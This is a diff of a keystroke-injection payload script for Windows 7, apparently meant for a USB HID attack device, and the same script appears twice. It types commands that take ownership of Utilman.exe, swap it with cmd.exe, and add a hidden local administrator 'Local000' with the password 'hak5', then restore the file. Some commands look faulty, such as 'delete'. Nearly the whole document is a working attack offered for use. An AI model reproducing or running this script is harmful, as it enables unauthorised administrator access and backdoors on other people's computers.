YourFriendCaspian · December 8, 2019 19:04
diff --git a/Payload_utilman_exploit.txt b/Payload_utilman_exploit.txt
 Rem:Author: Xcellerator (props to Jay Kruer's Fork Bomb script for the UAC bypass technique!)
 Rem:Duckencoder: 1.0
 Rem:Target: Windows 7
 Rem:Description: Uses the Utilman.exe Exploit to create a new local administrator account “Local000” REM with the password “hak5”.
 Rem:Author: Xcellerator
 Rem:Description: Utilman Exploiter to create a new Admin Account
 Rem:The new account will be called "Local000".
 Press:131
 CustomDelay:50
 Print:cmd
 Press:229
 Print:a
 Press:176
 Press:216
 Press:176
 CustomDelay:200
 Print:takeown /f \"%systemroot%\\System32\\Utilman.exe\"
 Press:176
 CustomDelay:50
 Print:icacls \"%systemroot%\\System32\\Utilman.exe\" /grant administrators:F /T
 Press:176
 CustomDelay:50
 Print:cd %systemroot%\\System32
 Press:176
 CustomDelay:50
 Print:mkdir util
 Press:176
 Print:xcopy cmd.exe util\\
 Press:176
 CustomDelay:50
 Print:ren Utilman.exe Utilman.exe.bak
 Press:176
 Print:cd util
 Press:176
 CustomDelay:50
 Print:ren cmd.exe Utilman.exe
 Press:176
 CustomDelay:50
 Print:cd ..
 Press:176
 CustomDelay:50
 Print:xcopy util/Utilman.exe \\
 Press:176
 CustomDelay:50
 Print:rmdir /s /q util
 Press:176
 CustomDelay:50
 Print:exit
 Press:176
 CustomDelay:50
 Press:131+117
 Print:net user Local000 /add
 Press:176
 CustomDelay:50
 Print:net localgroup administrators Local000 /add
 Press:176
 CustomDelay:50
 Print:exit
 Press:176
 CustomDelay:50
 Press:131+114
 Print:cmd
 Press:176
 CustomDelay:50
 Print:cd \"%systemroot%\\System32\"
 Press:176
 CustomDelay:50
 Print:delete Utilman.exe
 Press:176
 CustomDelay:50
 Print:y
 Press:176
 CustomDelay:50
 Print:ren Utilman.exe.bak Utilman.exe
 Press:176
 CustomDelay:50
 Print:exit
 Press:176
 Press:131
 Print:cmd
 Press:229
 Print:a
 Press:176
 CustomDelay:50
 Press:216
 Press:176
 CustomDelay:200
 Print:net user Local000 *
 Press:176
 Print:hak5
 Press:176
 Print:hak5
 Press:176
 Print:exit
 Press:176
	Rem:Author: Xcellerator (props to Jay Kruer's Fork Bomb script for the UAC bypass technique!)
	Rem:Duckencoder: 1.0
	Rem:Target: Windows 7
	Rem:Description: Uses the Utilman.exe Exploit to create a new local administrator account “Local000” REM with the password “hak5”.
	Rem:Author: Xcellerator
	Rem:Description: Utilman Exploiter to create a new Admin Account
	Rem:The new account will be called "Local000".
	Press:131
	CustomDelay:50
	Print:cmd
	Press:229
	Print:a
	Press:176
	Press:216
	Press:176
	CustomDelay:200
	Print:takeown /f \"%systemroot%\\System32\\Utilman.exe\"
	Press:176
	CustomDelay:50
	Print:icacls \"%systemroot%\\System32\\Utilman.exe\" /grant administrators:F /T
	Press:176
	CustomDelay:50
	Print:cd %systemroot%\\System32
	Press:176
	CustomDelay:50
	Print:mkdir util
	Press:176
	Print:xcopy cmd.exe util\\
	Press:176
	CustomDelay:50
	Print:ren Utilman.exe Utilman.exe.bak
	Press:176
	Print:cd util
	Press:176
	CustomDelay:50
	Print:ren cmd.exe Utilman.exe
	Press:176
	CustomDelay:50
	Print:cd ..
	Press:176
	CustomDelay:50
	Print:xcopy util/Utilman.exe \\
	Press:176
	CustomDelay:50
	Print:rmdir /s /q util
	Press:176
	CustomDelay:50
	Print:exit
	Press:176
	CustomDelay:50
	Press:131+117
	Print:net user Local000 /add
	Press:176
	CustomDelay:50
	Print:net localgroup administrators Local000 /add
	Press:176
	CustomDelay:50
	Print:exit
	Press:176
	CustomDelay:50
	Press:131+114
	Print:cmd
	Press:176
	CustomDelay:50
	Print:cd \"%systemroot%\\System32\"
	Press:176
	CustomDelay:50
	Print:delete Utilman.exe
	Press:176
	CustomDelay:50
	Print:y
	Press:176
	CustomDelay:50
	Print:ren Utilman.exe.bak Utilman.exe
	Press:176
	CustomDelay:50
	Print:exit
	Press:176
	Press:131
	Print:cmd
	Press:229
	Print:a
	Press:176
	CustomDelay:50
	Press:216
	Press:176
	CustomDelay:200
	Print:net user Local000 *
	Press:176
	Print:hak5
	Press:176
	Print:hak5
	Press:176
	Print:exit
	Press:176